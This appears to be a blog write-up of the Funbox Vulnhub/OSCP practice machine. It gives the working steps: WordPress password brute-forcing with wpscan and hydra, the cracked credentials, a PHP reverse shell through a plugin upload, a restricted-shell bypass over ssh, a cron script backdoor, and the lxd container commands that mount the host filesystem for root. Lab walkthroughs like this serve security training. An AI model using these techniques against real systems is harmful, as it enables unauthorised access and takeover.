Funbox Writeup [Detailed] From #Oscp practice Lab / #Vulnhub Box #lxd

 


MACHINE: FUNBOX

 FROM: OSCP PLAYGROUND/VULNHUB

 LEVEL: MEDIUM


Nmap

 PORT  STATE SERVICE REASON     VERSION  
 21/tcp open ftp   syn-ack ttl 63 ProFTPD  
 22/tcp open ssh   syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)  
 80/tcp open http  syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  
 | http-robots.txt: 1 disallowed entry   
 |_/secret/  
 |_http-server-header: Apache/2.4.41 (Ubuntu)  
 |_http-title: Did not follow redirect to http://funbox.fritz.box/  
 |_https-redirect: ERROR: Script execution failed (use -d to debug)  
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  

OPEN PORTS

21 FTP

22 ssh

80 web includes robots.txt

ENUMERATION


 PORT 21

It's an FTP port so try to login anonymous login, anonymous login is not allowed on this machine (it ask for a password)


PORT 22

it's a standard ssh port, version OpenSSH 8.2p1 so nothing is vulnerable 


PORT 80

when iam access that machine throw the web it redirects to this domain http://funbox.fritz.box/

 



so we  add this domain to our /etc/hosts

now its work



WordPress Site


in background [wpscan running] [ directory bruteforcing running]

further enum 

lets check robots.txt

 

found /secret/ directory

 

 FFUF and WPSCAN's Finished


wp-includes.php

id3 and ixr have exploits but it won't work maybe a rabbit hole so I didn't spend much time on this

[wpscan finished]

Found Two usernames

lets brute force the password using wpscan you also can use hydra

 

wpscan --Url http://funbox.fritz.box/ -U  admin -P /opt/rockyou.txt 



second user joe password bruteforce

this time we use hydra to bruteforce  :)

hydra -l joe -P /opt/rockyou.txt funbox.fritz.box -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'


compare to wpscan hydra is more lightweight and powerful

CREDS

admin - iubire

joe - 12345


 

we logged in as joe but we are just a user, we need an admin panel to get revershell

so next we login via admin (second user)

admin 


yep we are now admin 

there are multiple ways to get a revershell shell

convert PHP file to zip then upload plugins and install the plugin

or upload your PHP file at plugins/themes (some times won't work)

or use msfconsole 

use exploit/Unix.web app/wp_admin_shell_upload

 EASIEST WAY

 
 
  

 upload your PHP file here then access /plugin/aksimet/aksimet.php

 it is inactive so active this


access this PHP file

funbox.fritz.box/wp-content/plugins/akismet/akismet.php



we got a shell

HORIZONTAL PRIVELEGE ESCALATION

we have the password of joe

machine have ssh 

Let's login via sssh



ssh joe@192.168.136.77 -t "bash --noprofile" 

(to bypass restricted bash shell)




funny user executing the backup.sh (crontab) so I include revershhell




we are in and group

what is lxd?

it's also similar to docker container It offers a user experience similar to virtual machines but using Linux containers instead.


steps to exploit




https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

attacking machine and we are connecting throw a private VPN so we can't use GitHub to clone the repo

so we download and build at our local machine and send to victim machine via python server

a rootfs.squashfs and lxd.tar.xz



 



lxc init alpine privesc -c security.privileged=true (if any error do lxc init)



lxc list



lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

lxc start privesc



lxc exec privesc /bin/sh





That's it :)



1 تعليقات

إرسال تعليق

أحدث أقدم

Smartphones

Post ADS 1

Advertisement

Post ADS 1